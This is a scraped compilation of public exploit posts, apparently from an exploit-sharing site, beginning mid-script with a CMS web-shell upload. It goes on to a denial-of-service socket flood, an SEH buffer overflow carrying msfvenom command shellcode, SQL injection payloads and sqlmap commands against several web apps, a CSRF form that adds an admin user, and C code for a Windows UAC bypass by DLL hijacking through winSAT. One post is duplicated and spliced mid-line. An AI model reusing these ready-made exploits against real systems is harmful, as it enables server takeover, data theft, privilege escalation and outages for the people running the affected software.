<data><![CDATA[e2Zvcm1fc3RhcnQgYWN0aW9uPSJzYXZlc2V0dGluZ3MifQ0KPGRpdiBjbGFzcz0icGFnZW92ZXJmbG93Ij4NCiAgICA8cCBjbGFzcz0icGFnZXRleHQiPg0KICAgICAgICA8bGFiZWwgZm9yPSJ7JGFpZH1mbGQxIj57JG1vZC0+bGFuZygiYmFzZXVybCIpfTo8L2xhYmVsPiB7KmNtc19oZWxwIGtleT0naGVscF9hcnRpY2xlX3VzZWV4cGlyeScgdGl0bGU9JHVzZWV4cGlyYXRpb250ZXh0Kn0NCiAgICA8L3A+DQogICAgPHAgY2xhc3M9InBhZ2VpbnB1dCI+DQogICAgICAgIDxpbnB1dCBpZD0ieyRhaWR9ZmxkMSIgdHlwZT0idGV4dCIgc2l6ZT0iNjQiIGxlbmd0aD0iNjQiIHZhbHVlPSJ7JG1vZC0+cHJmKCJiYXNldXJsIil9IiBuYW1lPSJ7JGFpZH1iYXNldXJsIj57JG1vZC0+bGFuZygiYmFzZXVybGhlbHAiKX0NCiAgICA8L3A+DQo8L2Rpdj4NCg0KPGRpdiBjbGFzcz0icGFnZW92ZXJmbG93Ij4NCiAgICA8cCBjbGFzcz0icGFnZXRleHQiPg0KICAgICAgICA8bGFiZWwgZm9yPSJ7JGFpZH1mbGQzIj57JG1vZC0+bGFuZygiYXBpdG9rZW4iKX06PC9sYWJlbD4geypjbXNfaGVscCBrZXk9J2hlbHBfYXJ0aWNsZV91c2VleHBpcnknIHRpdGxlPSR1c2VleHBpcmF0aW9udGV4dCp9DQogICAgPC9wPg0KICAgIDxwIGNsYXNzPSJwYWdlaW5wdXQiPg0KICAgICAgICA8aW5wdXQgaWQ9InskYWlkfWZsZDMiIHR5cGU9InRleHQiIHNpemU9IjY0IiBsZW5ndGg9IjY0IiB2YWx1ZT0ieyRtb2QtPnByZigiYXBpdG9rZW4iKX0iIG5hbWU9InskYWlkfWFwaXRva2VuIj57JG1vZC0+bGFuZygiYXBpdG9rZW5oZWxwIil9DQogICAgPC9wPg0KPC9kaXY+DQoNCjxkaXYgY2xhc3M9InBhZ2VvdmVyZmxvdyI+DQogICAgPHAgY2xhc3M9InBhZ2V0ZXh0Ij4NCiAgICAgICAgPGxhYmVsIGZvcj0ieyRhaWR9ZmxkNCI+eyRtb2QtPmxhbmcoInNpdGVpZCIpfTo8L2xhYmVsPiB7KmNtc19oZWxwIGtleT0naGVscF9hcnRpY2xlX3VzZWV4cGlyeScgdGl0bGU9JHVzZWV4cGlyYXRpb250ZXh0Kn0NCiAgICA8L3A+DQogICAgPHAgY2xhc3M9InBhZ2VpbnB1dCI+DQogICAgICAgIDxpbnB1dCBpZD0ieyRhaWR9ZmxkNCIgdHlwZT0idGV4dCIgc2l6ZT0iOCIgbGVuZ3RoPSI4IiB2YWx1ZT0ieyRtb2QtPnByZigic2l0ZWlkIil9IiBuYW1lPSJ7JGFpZH1zaXRlaWQiPnskbW9kLT5sYW5nKCJzaXRlaWRoZWxwIil9DQogICAgPC9wPg0KPC9kaXY+DQoNCjxkaXYgY2xhc3M9InBhZ2VvdmVyZmxvdyI+DQogICAgPHAgY2xhc3M9InBhZ2V0ZXh0Ij4NCiAgICAgICAgPGxhYmVsIGZvcj0ieyRhaWR9ZmxkMiI+eyRtb2QtPmxhbmcoInRyYWNraW5nY29kZSIpfTo8L2xhYmVsPiB7KmNtc19oZWxwIGtleT0naGVscF9hcnRpY2xlX3VzZWV4cGlyeScgdGl0bGU9JHVzZWV4cGlyYXRpb250ZXh0Kn0NCiAgICA8L3A+DQogICAgPHAgY2xhc3M9InBhZ2VpbnB1dCI+DQogICAgICAgIDx0ZXh0YXJlYSBpZD0ieyRhaWR9ZmxkMiIgcm93cz0iMTIiIGNvbHM9IjQwIiBuYW1lPSJ7JGFpZH10cmFja2luZ2NvZGUiPnskbW9kLT5wcmYoInRyYWNraW5nY29kZSIpfTwvdGV4dGFyZWE+DQogICAgICAgIDxici8+DQogICAgICAgIHskbW9kLT5sYW5nKCJ0cmFja2luZ2NvZGVoZWxwIil9DQogICAgPC9wPg0KPC9kaXY+DQoNCjxkaXYgY2xhc3M9InBhZ2VvdmVyZmxvdyI+DQogICAgPHAgY2xhc3M9InBhZ2V0ZXh0Ij4NCg0KICAgIDwvcD4NCiAgICA8cCBjbGFzcz0icGFnZWlucHV0Ij4NCiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ieyRhaWR9c3VibWl0IiB2YWx1ZT0ieyRtb2QtPmxhbmcoInNhdmVzZXR0aW5ncyIpfSIvPg0KICAgIDwvcD4NCjwvZGl2Pg0KDQoNCntmb3JtX2VuZH0NCg==]]></data>\n    </file>\n</module>\r\n-----------------------------207726338310671742711263591267--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print "Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al"
HireHackking 
# Exploit Title: Blue Server 1.1 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-02
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.mafiatic.org/
# Software Link: https://master.dl.sourceforge.net/project/blueserver/Blue-Server-1.1.exe
# Version: 1.1
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

#!/usr/bin/python
import socket

print """
         \\\|///
       \\  - -  //
        (  @ @ )
 ----oOOo--(_)-oOOo----
 Blue Server 1.1 Dos
    Ihsan Sencan
 ---------------Ooooo----
                (   )
       ooooO     ) /
       (   )    (_/
        \ (
         \_)
"""
Ip = raw_input("[Ip]: ")
Port = 80 # Default port
 
d=[]
c=0
while 1:
    try:
        d.append(socket.create_connection((Ip,Port)))
        d[c].send("BOOM")
        print "Sie!"
        c+=1
    except socket.error: 
        print "Done!"
        raw_input()
        break
HireHackking 
# Exploit Title: Arm Whois 3.11 - Buffer Overflow (SEH)
# Date: 2018-11-05 
# Exploit Author: Yair Rodríguez Aparicio (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit)
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Proffesional Español SP3 x86 (PoC), Windows XP Proffesional English SP3 x86 (fully working)
 
# HOWTO:
# 1.- Run python code : python whois.py
# 2.- Copy content to clipboard, from console or from file - text.txt 
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- CMD is popped. 

#max buffer lenght: 658. Badchars: a lot of. alpha_mixed + "\x89" works fine. 

#msfvenom -p windows/exec CMD=cmd.exe -f py -e x86/alpha_mixed -b "\x89"
#445
buf =  ""
buf += "\x54\x5d\xdb\xd5\xd9\x75\xf4\x59\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
buf += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x6b\x58\x4d\x52"
buf += "\x33\x30\x75\x50\x35\x50\x31\x70\x4c\x49\x68\x65\x56"
buf += "\x51\x39\x50\x70\x64\x4c\x4b\x32\x70\x36\x50\x4e\x6b"
buf += "\x73\x62\x54\x4c\x4e\x6b\x72\x72\x62\x34\x4c\x4b\x54"
buf += "\x32\x54\x68\x34\x4f\x6d\x67\x32\x6a\x77\x56\x46\x51"
buf += "\x49\x6f\x6c\x6c\x47\x4c\x61\x71\x63\x4c\x63\x32\x54"
buf += "\x6c\x61\x30\x59\x51\x7a\x6f\x66\x6d\x35\x51\x4a\x67"
buf += "\x59\x72\x5a\x52\x33\x62\x30\x57\x4c\x4b\x50\x52\x64"
buf += "\x50\x4c\x4b\x52\x6a\x77\x4c\x4c\x4b\x42\x6c\x46\x71"
buf += "\x44\x38\x69\x73\x71\x58\x63\x31\x5a\x71\x73\x61\x4c"
buf += "\x4b\x32\x79\x35\x70\x47\x71\x6b\x63\x4e\x6b\x32\x69"
buf += "\x36\x78\x5a\x43\x45\x6a\x33\x79\x4e\x6b\x64\x74\x6c"
buf += "\x4b\x77\x71\x7a\x76\x35\x61\x4b\x4f\x6e\x4c\x7a\x61"
buf += "\x68\x4f\x64\x4d\x33\x31\x48\x47\x66\x58\x6d\x30\x53"
buf += "\x45\x49\x66\x54\x43\x43\x4d\x58\x78\x65\x6b\x61\x6d"
buf += "\x76\x44\x53\x45\x4d\x34\x50\x58\x4c\x4b\x42\x78\x74"
buf += "\x64\x56\x61\x39\x43\x71\x76\x6c\x4b\x34\x4c\x52\x6b"
buf += "\x4c\x4b\x32\x78\x55\x4c\x75\x51\x68\x53\x6e\x6b\x56"
buf += "\x64\x6e\x6b\x65\x51\x78\x50\x6c\x49\x73\x74\x37\x54"
buf += "\x47\x54\x61\x4b\x53\x6b\x53\x51\x71\x49\x73\x6a\x62"
buf += "\x71\x6b\x4f\x4d\x30\x33\x6f\x43\x6f\x71\x4a\x6c\x4b"
buf += "\x64\x52\x4a\x4b\x4e\x6d\x53\x6d\x31\x7a\x57\x71\x6c"
buf += "\x4d\x4c\x45\x68\x32\x47\x70\x47\x70\x57\x70\x66\x30"
buf += "\x75\x38\x56\x51\x6e\x6b\x70\x6f\x6d\x57\x39\x6f\x49"
buf += "\x45\x6d\x6b\x4a\x50\x4e\x55\x69\x32\x50\x56\x73\x58"
buf += "\x59\x36\x4c\x55\x6f\x4d\x6f\x6d\x6b\x4f\x48\x55\x67"
buf += "\x4c\x45\x56\x63\x4c\x77\x7a\x4f\x70\x59\x6b\x4d\x30"
buf += "\x30\x75\x57\x75\x4f\x4b\x37\x37\x42\x33\x70\x72\x62"
buf += "\x4f\x63\x5a\x75\x50\x50\x53\x39\x6f\x4b\x65\x35\x33"
buf += "\x50\x6d\x53\x54\x46\x4e\x30\x65\x62\x58\x53\x55\x75"
buf += "\x50\x41\x41"

shellcode = buf + "\x41"*(658-len(buf))
EDX_BAD_OVERWRITE = "\x42"*4
EIP = "\xC2\x34\x40"
second_space = "\xe9\x65\xFD\xFF\xFF"+ "\x43"*3
first_space = "\x43"*2 + "\xEB\xF2"

buffer = "\x41\x41" + shellcode + EDX_BAD_OVERWRITE + second_space + first_space + EIP 
print buffer
f = open("text.txt", "w")
f.write(buffer)
f.close()
HireHackking 
# Exploit Title: Grocery crud 1.6.1 - 'search_field' SQL Injection
# Google Dork: n/a
# Date: 2018-11-05
# Exploit Author: Loading Kura Kura  
# Vendor Homepage: https://www.grocerycrud.com/
# Software Link: https://www.grocerycrud.com/downloads
# Version: 1.6.1
# Tested on: Win10/Kali Linux
# CVE : 

# 1. Proof of Concept :
# save request to file, example request.txt

sqlmap -r grocery.txt --level=3 --risk=2 --dbs --dbms=mysql --fresh-queries -p search_field

Request
========================
POST /grocerycrud/index.php/examples/customers_management/ajax_list_info HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/grocerycrud/index.php/examples/customers_management
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Connection: close

search_text=dd&search_field=%5c%27city&per_page=10&order_by%5B0%5D=&order_by%5B1%5D=&page=1

========================

vuln on parameter "search_field"
================================
Parameter: search_field (POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: search_text=dd&search_field=-7154 OR 1 GROUP BY CONCAT(0x7178707a71,(SELECT (CASE WHEN (3651=3651) THEN 1 ELSE 0 END)),0x716b6a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&per_page=10&order_by[0]=&order_by[1]=&page=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: search_text=dd&search_field=(CASE WHEN (2922=2922) THEN SLEEP(5) ELSE 2922 END)&per_page=10&order_by[0]=&order_by[1]=&page=1

================================

bug hunter....
HireHackking 
# Exploit Title: OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-11-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://zsoft.com.bd/
# Software Link: https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/admin/addUser.php
# 
POST /[PATH]/admin/addUser.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=macg4h63q378u11758a1pslek7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
userName=efe&name=efe&password=efe&email=efe@omerefe.com&details=efe&role=1&submit=Create
HTTP/1.1 302 Found
Date: Tue, 06 Nov 2018 20:57:18 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: max-age=2592000
Pragma: no-cache
Location: login.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

/* `exploitdb`.`tbl_user` */
$tbl_user = array(
  array('id' => '38','name' => 'efe','username' => 'efe','password' => '5ebf8364d17c8df7e4afd586c24f84a0','email' => 'efe@omerefe.com','details' => 'efe','role' => '1')
);

# POC: 
# 2)
# http://localhost/[PATH]/admin/addUser.php
# 
<html>
<body>
<form action="http://192.168.1.36/ExploitDb/blog_fo_rup/admin/addUser.php" method="post" enctype="multipart/form-data">
<table class="form">					
<tbody><tr>
<td>
<label>User Name</label>
</td>
<td>
<input name="userName" placeholder="Enter User Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>Full Name</label>
</td>
<td>
<input name="name" placeholder="Enter User Full Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>User Password</label>
</td>
<td>
<input name="password" placeholder="Enter User Password..." type="text">
</td>
</tr>
<tr>
<td>
<label>Email</label>
</td>
<td>
<input name="email" placeholder="Enter User Email..." type="text">
</td>
</tr>
<tr>
<td>
<label>Details</label>
</td>
<td> 
<textarea name="details"></textarea>
</td>
</tr>
<tr>
<td>
<label>User Roll</label>
</td>
<td>
<select id="select" name="role">
<option>Select User Role</option>
<option value="0">Admin</option>
<option value="1">Author</option>
<option value="2">Editor</option>
</select>
</td>
</tr>
<tr>
<td></td> 
<td>
<input name="submit" value="Create" type="submit">
</td>
</tr>
</tbody>
</table>
</form>
</body>
</html>
HireHackking 
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-11-05
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
 
# Steps to Reproduce: 

# 1. Run the python code organization.py 
# 2. Open organization_exploit.txt and copy the content 
# 3. Open VSAXESS.exe 
# 4. Register a password and username
# 5. choose 'Control Panel'
# 6. choose 'Access Control'
# 7. choose 'Add'
# 8. Paste the content from organization_exploit.txt on 'Organization' and Crashed
 
#!/usr/bin/env python3

content = "\x41" * 10000
f = open ("organization_exploit.txt", "w")
f.write(content)
f.close()
HireHackking 
# Exploit Title: eToolz 3.4.8.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-03
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.gaijin.at
# Software Link: https://www.gaijin.at/de/software/etoolz
# Version: 3.4.8.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Host name / IP adress :

#!/usr/bin/python
    
buffer = "A" * 255
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."# Exploit Title: eToolz 3.4.8.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-03
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.gaijin.at
# Software Link: https://www.gaijin.at/de/software/etoolz
# Version: 3.4.8.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Host name / IP adress :

#!/usr/bin/python
    
buffer = "A" * 255
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."
HireHackking 
# Exploit Title: OOP CMS BLOG 1.0 - 'search' SQL Injection
# Dork: N/A
# Date: 2018-11-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://zsoft.com.bd/
# Software Link: https://datapacket.dl.sourceforge.net/project/php-oop-cms-blog/blog_fo_rup.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/search.php?search=[SQL]
# 
GET /[PATH]/search.php?search=Efe%27%20%20UNION%20SELECT%201,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),4,5,6,7,8,9--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 06 Nov 2018 20:31:15 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/page.php?pageid=[SQL]
# 
GET /[PATH]/page.php?pageid=8%20%20UNION(SELECT%20%28%31%29,%28%32%29,(SELECT%20GROUP_CONCAT(schema_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.SCHEMATA))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 06 Nov 2018 20:33:44 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 3)
# http://localhost/[PATH]/posts.php?id=[SQL]
# 
GET /[PATH]/posts.php?id=3%27++UNION+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 06 Nov 2018 20:35:57 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 3732
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HireHackking 
Exploit Title: libiec61850 1.3 - Stack Based Buffer Overflow
# Date: 2018-11-06
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://libiec61850.com/libiec61850/
# Software Link: https://github.com/mz-automation/libiec61850
# Version: 1.3
# Tested on: Linux 4.15.0-38-generic
# CVE: CVE-2018-18957
# References:
# https://github.com/mz-automation/libiec61850/issues/83
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18957

# Summary
# While fuzzing a stack based buffer overflow was found in libIEC61850 (the
# open-source library for the IEC 61850 protocols) in prepareGooseBuffer in
# goose/goose_publisher.c

## Steps to reproduce

$ ./goose_publisher_example crash_goosecr_stack_smash_overflow_aaaaaaaaa
Using interface crash_goosecr_stack_smash_overflow_aaaaaaaaa
*** stack smashing detected ***: <unknown> terminated
Aborted
$

## Debugging

(gdb) run crash_goosecr_stack_smash_overflow_aaaaaaaaa
Starting program:
/home/input0/Desktop/libiec61850/examples/goose_publisher/goose_publisher_example
crash_goosecr_stack_smash_overflow_aaaaaaaaa
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Using interface crash_goosecr_stack_smash_overflow_aaaaaaaaa
*** stack smashing detected ***: <unknown> terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
51    ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1  0x00007ffff7805801 in __GI_abort () at abort.c:79
#2  0x00007ffff784e897 in __libc_message (action=action@entry=do_abort,
fmt=fmt@entry=0x7ffff797b988 "*** %s ***: %s terminated\n")
    at ../sysdeps/posix/libc_fatal.c:181
#3  0x00007ffff78f9cd1 in __GI___fortify_fail_abort
(need_backtrace=need_backtrace@entry=false,
    msg=msg@entry=0x7ffff797b966 "stack smashing detected") at
fortify_fail.c:33
#4  0x00007ffff78f9c92 in __stack_chk_fail () at stack_chk_fail.c:29
#5  0x000055555555a211 in Ethernet_getInterfaceMACAddress
(interfaceId=0x7fffffffdeee "crash_goosecr_stack_smash_overflow_aaaaaaaaa",
    addr=0x7fffffffd91c "k_smas\377\377") at
hal/ethernet/linux/ethernet_linux.c:170
#6  0x00005555555594ee in prepareGooseBuffer (self=0x5555557637d0,
parameters=0x7fffffffd9ac,
    interfaceID=0x7fffffffdeee
"crash_goosecr_stack_smash_overflow_aaaaaaaaa") at
src/goose/goose_publisher.c:168
#7  0x0000555555559293 in GoosePublisher_create (parameters=0x7fffffffd9ac,
    interfaceID=0x7fffffffdeee
"crash_goosecr_stack_smash_overflow_aaaaaaaaa") at
src/goose/goose_publisher.c:72
#8  0x0000555555555387 in main (argc=2, argv=0x7fffffffdaa8) at
goose_publisher_example.c:52
(gdb) i r
rax            0x0    0
rbx            0x7fffffffd6b0    140737488344752
rcx            0x7ffff7803e97    140737345765015
rdx            0x0    0
rsi            0x7fffffffd410    140737488344080
rdi            0x2    2
rbp            0x7fffffffd840    0x7fffffffd840
rsp            0x7fffffffd410    0x7fffffffd410
r8             0x0    0
r9             0x7fffffffd410    140737488344080
r10            0x8    8
r11            0x246    582
r12            0x7fffffffd6b0    140737488344752
r13            0x1000    4096
r14            0x0    0
r15            0x30    48
rip            0x7ffff7803e97    0x7ffff7803e97 <__GI_raise+199>
eflags         0x246    [ PF ZF IF ]
cs             0x33    51
ss             0x2b    43
ds             0x0    0
es             0x0    0
fs             0x0    0
gs             0x0    0
(gdb)

## src

Snip : src/goose/goose_publisher.c

{
    GoosePublisher self = (GoosePublisher) GLOBAL_CALLOC(1, sizeof(struct
sGoosePublisher));
    prepareGooseBuffer(self, parameters, interfaceID);
    self->timestamp = MmsValue_newUtcTimeByMsTime(Hal_getTimeInMs());
    GoosePublisher_reset(self);
    return self;
}

Snip: src/goose/goose_publisher.c

    if (interfaceID != NULL)
        Ethernet_getInterfaceMACAddress(interfaceID, srcAddr);
    else
Ethernet_getInterfaceMACAddress(CONFIG_ETHERNET_INTERFACE_ID, srcAddr);
HireHackking 
# Exploit Title: OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection
# Date: ]2018-11-05
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://sourceforge.net/projects/bigchef/
# Software Link: https://sourceforge.net/projects/bigchef/files/latest/download
# Version: v3.0.8
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Description: Cubi Platform login page is prone to an SQL-injection vulnerability.
# Exploiting this issue could allow an attacker to compromise the application,
# access or modify data, or exploit latent  vulnerabilities in the underlying database.
#########################################################
# PoC : SQLi :

# POST : POST
/bin/controller.php?F=RPCInvoke&P0=[user.form.LoginForm]&P1=[Login]&__this=btn_login:onclick&_thisView=user.view.LoginView&jsrs=1
# Parameter: MULTIPART username ((custom) POST)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind


# Payload:

-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="username"

admin' AND SLEEP(5)-- JgaK
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="password"

password
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"

Don't save session
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"

0
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"

English ( en_US )
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"

en_US
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="btn_client_login"


-----------------------------71911072106778878648823492--
---
HireHackking 
#include "stdafx.h"
#include <Windows.h>
#include "resource.h"

void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) {
	HMODULE hMod = GetModuleHandle(NULL);
	HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName);
	DWORD dllSize = SizeofResource(hMod, res);
	void* dllBuff = LoadResource(hMod, res);
	HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
	DWORD sizeOut;
	WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL);
	CloseHandle(hDll);
}

int main()
{
	_SHELLEXECUTEINFOW se = {};
	//Create Mock SystemRoot Directory
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
	CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false);

	//Drop our dll for hijack
	DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");

	//Execute our winSAT.exe copy from fake trusted directory
	se.cbSize = sizeof(_SHELLEXECUTEINFOW);
	se.lpFile =  L"C:\\Windows \\System32\\winSAT.exe";
	se.lpParameters = L"formal";
	se.nShow = SW_HIDE;
	se.hwnd = NULL;
	se.lpDirectory = NULL;
	ShellExecuteEx(&se);

    	return 0;
}
HireHackking 
# Exploit Title: PlayJoom 0.10.1 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-11-07
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://playjoom.telgo.info/
# Software Link: https://ayera.dl.sourceforge.net/project/playjoom/0.10.1/playjoom-0.10.1-install_package.zip
# Version: 0.10.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_playjoom&view=genre&catid=[SQL]
# 
GET /[PATH]/index.php?option=com_playjoom&view=genre&catid=%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 348175763341e76e6aadad3ee54838ec=en-GB; PHPSESSID=macg4h63q378u11758a1pslek7; 7464bee77ffeb893cc3113afbb45f7b3=g63a0tdt8boftnmbbj2pgbt6t1; 348175763341e76e6aadad3ee54838ec=en-GB
Connection: keep-alive
HTTP/1.1 303 See other
Date: Tue, 06 Nov 2018 23:55:30 GMT
